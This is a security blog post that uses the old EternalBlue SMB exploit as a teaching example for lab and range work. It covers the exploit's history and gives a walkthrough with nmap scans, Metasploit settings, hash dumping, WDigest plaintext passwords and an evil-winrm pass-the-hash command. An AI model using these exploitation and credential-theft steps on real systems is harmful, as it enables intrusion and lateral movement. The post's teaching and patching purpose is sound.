TL;DR Why old 0 Days make great teaching tools, the background of one, and a walkthrough.
Welcome to Part VIII of our Back to the Basics Series!
Part I: NTDS.dit vs SAM
Part II: Ownership Matters
Part III: Recovering from a Crash
Part IV: Setting up a Simple Honeypot Account
Part V: Automating DC Deployment
Part VI: Sometimes it’s the dumbest thing
Part VII: Merry Christmas, macros, & Base64
Part VIII: Why old 0 Days make great teaching tools
Part XI: Windows Event Forwarding & SACLs
Part XIII: Setting up a simple honey token
Part XIV: Smartcards and Pass-the-Hash
Getting lectured on security best practices is one thing.
Seeing & doing it for yourself is something else.
As an example, here is what Microsoft said about a vulnerability:
“This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.”
But what does that actually mean? Why should an overworked & underpaid sysadmin make it a priority? How would he/she explain to management why it should be a priority?
An oldie but a goodie
Hence old 0 Days like EternalBlue make excellent teaching tools, even though EternalBlue is from 2017. CTFs still use it, courses use it, and I have used it for simple reasons:
- It works (99% of the time a student can copy/paste Metasploit commands and access a VM)
- It’s easy to set up for students (just fire up an unpatched Win Server 2008 R2 VM)
- It is an immediate eye opener for those who are new to RCE
- It really hits home the point that prompt patching is vital
Even the college I went to put a packet capture of an attacker using EternalBlue and a cmd.exe reverse shell to load and run fgdump on a target. I would imagine they used cmd.exe since Meterpreter is encrypted and thus does not make for a great teaching tool for traffic analysis.
This vulnerability was known by several names: MS17-010 [Microsoft security bulletin], CVE-2017-0143 [from CVSS], and its commonly known name, EternalBlue. The vulnerability was in Microsoft’s implementation of SMB1. At the time of discovery Microsoft was recommending that administrators disable the use of SMB1; however, the protocol was enabled by default. The vulnerability resulted in RCE as NT AUTHORITY\SYSTEM, meaning of course complete compromise. Due to how Windows stores domain credentials, this could also mean compromise of much more than just the one vulnerable system, as seen once NotPetya hit the scene.
- Early to mid 2016 — the Shadow Brokers somehow gain access to a critical Windows exploit
- Jan 2017 — they begin trying to sell tools related to the exploit
- Late Feb 2017 — the vulnerability is publicly classified as CVE-2017-0143
- 14 Mar 2017 — MS releases a patch as part of ‘Patch Tuesday’
- 14 Apr 2017 — Shadow Brokers publicly release their tool on GitHub
- 21 May 2017 — one of the most notorious ransomware attacks begins: WannaCry. It uses the vulnerability to infect unpatched systems worldwide.
On a side note, many courses now stress that the ‘time from disclosure to publicly available exploit’ has decreased considerably in recent years.
Walkthrough on THM
Start by running a simple port scan of the target:
sudo nmap -sV -O 10.10.93.156
Nmap includes some really handy scripts that do much more than just port scans. Some of them are pretty decent vulnerability scanners.
nmap -Pn --script vuln 10.10.93.156
Metasploit makes using the vulnerability incredibly simple. One can simply copy/paste the CVE or Microsoft bulletin and then search them in Metasploit to find a matching exploit.
set RHOST 10.10.93.156
set LHOST 10.6.36.88
That’s it. This is why old 0 Days make such good teaching tools. They’re a great hands-on aid for stressing how critical patching is. They are also great for hands-on awareness of common post-exploitation TTPs.
An attacker can search for interesting files via
search -f *password*
They can also navigate around the file system and pull data. Just remember that you have to escape characters like ‘$’ and ‘\’ with a backslash.
One can dump the NTLM hashes via
Alternatively one can also use kiwi.
Kiwi is useful for checking for plaintext credentials that may be stored in Windows, as seen below in the range.
Using it on a range
A while back I stood up a quick & dirty cyber range for hands-on security awareness. I used an unpatched Windows Server 2008 R2 VM as the initial target. The short slide deck that went with the range stressed the importance of patching and kept harping on EternalBlue as an example. This was meant to give users a big hint as to what they should look for.
The initial steps to gain access were the same as the THM walkthrough, but there was a twist. The vulnerable VM was only the first of 3 targets and the next 2 were patched. Users were meant to get hands on with post exploitation techniques, explore the VM, find 2 flags, and find the key that would allow them to move laterally into the second target VM.
Much like THM, the first flag was a text file on the Administrator’s desktop.
The second flag however was a user’s password. Microsoft enabled WDigest by default in Windows versions up to Server 2012. All I had to do was create a user named ‘readme’, set their password to a flag, and log them into the VM before the range started.
At this point the users were meant to run hashdump, notice that SID 500’s password was the only one not stored in plaintext, and use PTH to access the second VM.
One can use Metasploit’s PSexec; the problem is that it tends to trip Defender on updated Windows systems. It’s also not really ‘living off the land’. Therefore a better option is often to just use evil-winrm to PTH:
evil-winrm -i 192.168.0.12 -u skywalker -H 555b3519c107db4ea45104446e322ad7
This works against the default Windows configuration and does not rely on an unpatched vulnerability. This is because while NTLMv2 is salted, the salt is made up of things that are known to the attacker like the time and a nonce that is sent from the server being authenticated to.
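The reasoning above as an added Python sketch (not from the original post): the NTLMv2 proof is an HMAC-MD5 keyed on the NT hash over values that travel in the clear, so a server checking against the stored hash cannot tell whether the client knew the password or only the hash. The account name, domain and NT hash are constructed sample values; the layout follows the NTLMv2 computation in MS-NLMP, simplified with an empty target-info field.

```python
import hashlib
import hmac
import os
import struct
import time

# Constructed sample values, not taken from the post or any real system.
USER, DOMAIN = "alice", "LAB"
NT_HASH = bytes.fromhex("00112233445566778899aabbccddeeff")


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """ResponseKeyNT: HMAC-MD5 keyed on the NT hash; no password involved."""
    identity = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash, identity, hashlib.md5).digest()


def filetime_now() -> bytes:
    """Windows FILETIME: 100 ns ticks since 1601-01-01, little-endian."""
    return struct.pack("<Q", int((time.time() + 11644473600) * 10_000_000))


def client_response(nt_hash, user, domain, server_challenge, target_info=b""):
    """NTLMv2 response a client builds after receiving the server challenge."""
    # The "salt": version bytes, timestamp, client nonce. All sent in clear.
    blob = (b"\x01\x01" + b"\x00" * 6 + filetime_now() + os.urandom(8)
            + b"\x00" * 4 + target_info + b"\x00" * 4)
    key = ntowf_v2(nt_hash, user, domain)
    proof = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    return proof + blob


def server_verify(stored_nt_hash, user, domain, server_challenge, response):
    """Verifier recomputes the proof from the stored NT hash and compares."""
    proof, blob = response[:16], response[16:]
    key = ntowf_v2(stored_nt_hash, user, domain)
    expected = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


if __name__ == "__main__":
    challenge = os.urandom(8)  # the server's nonce
    resp = client_response(NT_HASH, USER, DOMAIN, challenge)
    print("accepted with stored hash:", server_verify(NT_HASH, USER, DOMAIN, challenge, resp))
    print("replayed on new challenge:", server_verify(NT_HASH, USER, DOMAIN, os.urandom(8), resp))
```

The nonce and timestamp stop a captured response from being replayed, but they do nothing for a stolen hash, which is why the NT hash has to be protected like the password itself.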
New vulnerabilities come up all the time. Today’s 0 Day is next month’s old news. However, post-exploitation techniques don’t change nearly as often. Much of defense focuses on ensuring that the breach of one system does not result in the breach of all.
Therefore old 0 Days still make great teaching tools.
There is another valuable lesson in there; while SMB1 was enabled by default, Microsoft had been recommending that administrators disable it since at least Sep 2016. This was almost a year before the infamous ransomware struck that exploited the vulnerability. As Microsoft pointed out at the time, SMB1 was designed for a world that no longer existed. It was designed for a small environment where everyone knew everyone, everyone trusted everyone, and there were no malicious actors present.
If you don’t absolutely require old legacy services, protocols, etc., then disable them. There are others still in Windows that an attacker will happily abuse, such as NetBIOS Name Service, LLMNR, lack of enforcing SMB signing, etc.
Microsoft security bulletin RE MS17-010: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010
Mandiant on time from patch to exploit: https://www.mandiant.com/resources/blog/time-between-disclosure-patch-release-and-vulnerability-exploitation
Microsoft recommendation to disable SMB1: https://techcommunity.microsoft.com/t5/storage-at-microsoft/stop-using-smb1/ba-p/425858
EternalBlue timeline: https://boot13.com/windows/timeline-nsa-hacking-tool-to-wannacry/
WDigest & plaintext passwords: https://blog.netwrix.com/2022/10/11/wdigest-clear-text-passwords-stealing-more-than-a-hash/
Hashes explained: https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4